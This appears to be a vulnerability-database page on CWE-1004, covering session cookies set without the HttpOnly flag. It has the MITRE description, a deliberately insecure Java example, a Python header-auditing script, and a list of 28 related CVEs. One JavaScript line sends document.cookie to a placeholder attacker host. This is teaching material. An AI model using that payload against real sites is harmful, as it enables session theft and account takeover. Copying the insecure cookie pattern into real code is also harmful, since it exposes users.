
CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) — Vulnerability Class 28

28 vulnerabilities classified as CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag). AI Chinese analysis included.

CWE-1004 represents a configuration weakness where sensitive data, such as a session identifier, is stored in a cookie that lacks the HttpOnly attribute. Without that attribute, client-side script, including malicious JavaScript injected through a Cross-Site Scripting (XSS) vulnerability, can read the cookie via document.cookie and send its contents elsewhere. Attackers typically exploit this by executing script in the victim's browser to steal the session token and then hijack the account or perform unauthorized actions. To mitigate the risk, developers must explicitly set the HttpOnly flag on every cookie that carries sensitive information. The flag instructs the browser to withhold the cookie from client-side script, so XSS-based cookie theft fails. With this configuration in place, an attacker who does find an XSS vulnerability still cannot read the authentication data stored in the cookie.

MITRE CWE Description
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

Common Consequences (2)
Confidentiality: Read Application Data
If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
Integrity: Gain Privileges or Assume Identity
If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.

Mitigations (1)
Implementation: Leverage the HttpOnly flag when setting a sensitive cookie in a response.
Effectiveness: High
Examples (1)
In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

Bad (Java): the cookie is created without calling setHttpOnly(true), so it stays readable from script.
String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);
response.addCookie(c);

Attack (JavaScript): injected script reads the cookie and ships it to a collector.
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie + '">');
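As an added, runnable check that is not part of the CWE entry or this page (Python, with a constructed sample of response headers): it parses Set-Cookie values, flags session-like cookies that lack HttpOnly, goes beyond the page by also flagging a missing Secure attribute, and builds the hardened counterpart of the Java snippet above. The name heuristic SENSITIVE_NAME_RE is an assumption, not a standard.

```python
"""CWE-1004 check: audit Set-Cookie headers and build a hardened one (added example)."""
import re
from http.cookies import SimpleCookie

# Cookie names that usually carry session or auth material (constructed heuristic).
SENSITIVE_NAME_RE = re.compile(r"sess|sid|auth|token|login|jwt", re.IGNORECASE)

def parse_set_cookie(header: str) -> tuple[str, dict]:
    """Split one Set-Cookie value into (cookie name, {attribute: value}).
    Attribute names are case-insensitive (RFC 6265), so they are lower-cased;
    flag attributes such as HttpOnly map to an empty string."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, value = part.partition("=")
            attrs[key.strip().lower()] = value.strip()
    return name, attrs

def audit_set_cookies(headers: list[str]) -> list[tuple[str, tuple]]:
    """Return (name, missing_attributes) for each sensitive-looking cookie
    that lacks HttpOnly (CWE-1004) or Secure; an empty list means clean."""
    findings = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        if not SENSITIVE_NAME_RE.search(name):
            continue
        missing = tuple(label for label, key in (("HttpOnly", "httponly"), ("Secure", "secure"))
                        if key not in attrs)
        if missing:
            findings.append((name, missing))
    return findings

def build_session_cookie(session_id: str) -> str:
    """Hardened Set-Cookie value for a session cookie: HttpOnly, Secure, SameSite."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    cookie["session_id"]["httponly"] = True
    cookie["session_id"]["secure"] = True
    cookie["session_id"]["samesite"] = "Lax"
    cookie["session_id"]["path"] = "/"
    return cookie["session_id"].OutputString()

# Constructed sample headers, as a scanner would read them from a response.
SAMPLE_HEADERS = [
    "session_id=abc123; Path=/",                               # CWE-1004: script-readable
    "auth_token=xyz; Path=/; Secure",                          # still missing HttpOnly
    "JSESSIONID=def; Path=/; HttpOnly; Secure; SameSite=Lax",  # fine
    "theme=dark; Path=/",                                      # not sensitive, ignored
]
```

HttpOnly only blocks reads of document.cookie; script running on a compromised page can still issue requests that carry the cookie, so the flag limits the damage of an XSS flaw rather than replacing the fix for it.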
CVE ID | Title | Product | CVSS | Severity | Published
CVE-2026-42239 | Budibase auth session cookies are set with httpOnly:false — any XSS can lead to full account takeover | budibase | 8.1 | High | 2026-05-07
CVE-2026-0696 | Session Cookies Missing HttpOnly Attribute | PSA | 6.5 | Medium | 2026-01-16
CVE-2026-22081 | Cookie without HTTPOnly Flag Vulnerability in Tenda Wireless Routers | 300Mbps Wireless Router F3 and N300 Easy Setup Router | 7.5 | - | 2026-01-09
CVE-2025-12031 | HTTP Security Misconfiguration - Lacking Secure and HTTPOnly Attribute | BLU-IC2 | 5.3 (AI) | Medium (AI) | 2025-10-21
CVE-2025-42909 | Security Misconfiguration vulnerability in SAP Cloud Appliance Library Appliances | SAP Cloud Appliance Library Appliances | 3.0 | Low | 2025-10-14
CVE-2025-27453 | CVE-2025-27453 | Endress+Hauser MEAC300-FNADE4 | 5.3 | Medium | 2025-07-03
CVE-2025-49189 | Cookie missing HttpOnly flag | SICK Media Server | 5.3 | Medium | 2025-06-12
CVE-2025-47289 | Stored XSS in CE Phoenix Cart Testimonials Allows Account Takeover if Missing HttpOnly Flag | PhoenixCart | 6.3 | Medium | 2025-06-02
CVE-2025-24318 | Dario Health USB-C Blood Glucose Monitoring System Starter Kit Android Application Sensitive Cookie Without 'HttpOnly' Flag | Dario Application Database and Internet-based Server Infrastructure | 6.8 | Medium | 2025-02-28
CVE-2025-0479 | Security Misconfiguration Vulnerability in CP Plus Router | CP-XR-DE21-S Router | 9.1 | - | 2025-01-20
CVE-2022-43845 | IBM Aspera Console information disclosure | Aspera Console | 3.7 | Low | 2024-09-24
CVE-2022-33167 | IBM Security Directory Integrator information disclosure | Security Directory Integrator | 3.7 | Low | 2024-07-30
CVE-2024-41685 | Cookie Without HTTPOnly Flag Set Vulnerability | SyroTech SY-GPON-1110-WDONT router | 5.3 | - | 2024-07-26
CVE-2024-6739 | Openfind MailGates and MailAudit - Sensitive Cookie Without 'HttpOnly' Flag | MailGates | 5.3 | Medium | 2024-07-15
CVE-2023-4217 | Session cookies attribute not set properly | PT-G503 Series | 3.1 | Low | 2023-11-02
CVE-2023-4228 | ioLogik 4000 Series: Session Cookies Attribute Not Set Properly | ioLogik 4000 Series | 3.1 | Low | 2023-08-24
CVE-2023-2876 | Session cookie exposure for client side script | REX640 PCL1 | 3.1 | Low | 2023-06-13
CVE-2022-21939 | Sensitive cookie without 'HttpOnly' flag in System Configuration Tool (SCT) | System Configuration Tool (SCT) | 7.5 | High | 2023-02-09
CVE-2019-25091 | nsupdate.info CSRF Cookie base.py cookie httponly flag | nsupdate.info | 3.7 | Low | 2022-12-27
CVE-2022-4630 | Sensitive Cookie Without 'HttpOnly' Flag in lirantal/daloradius | lirantal/daloradius | 5.3 | - | 2022-12-21
CVE-2022-25172 | InHand Networks InRouter302 cross-site scripting vulnerability | InRouter302 | 6.1 | - | 2022-05-12
CVE-2021-42115 | Missing HTTPOnly flag on sensitive cookie in TopEase | TopEase | 8.1 | High | 2021-11-30
CVE-2021-39210 | Autologin cookie accessible by scripts | glpi | 6.5 | Medium | 2021-09-15
CVE-2021-3706 | Sensitive Cookie Without 'HttpOnly' Flag in pi-hole/adminlte | pi-hole/adminlte | 7.5 | - | 2021-09-15
CVE-2021-34563 | In WirelessHART-Gateway versions 3.0.8 and 3.0.9 the HttpOnly flag is missing in a cookie which allows client-side javascript to modify it | WHA-GW-F2D2-0-AS- Z2-ETH | 3.3 | Low | 2021-08-31
CVE-2020-27658 | Synology Router Manager security vulnerability | Synology Router Manager (SRM) | 7.1 | High | 2020-10-29
CVE-2020-6267 | SAP Disclosure Management cross-site scripting vulnerability | SAP Disclosure Management | 6.5 | - | 2020-07-14
CVE-2019-8283 | Gemalto Admin Control Center information disclosure vulnerability | Sentinel LDK RTE | 6.5 | - | 2019-06-07

Vulnerabilities classified as CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) account for 28 CVEs. The CWE taxonomy describes the weakness; review the individual CVEs for product-specific impact.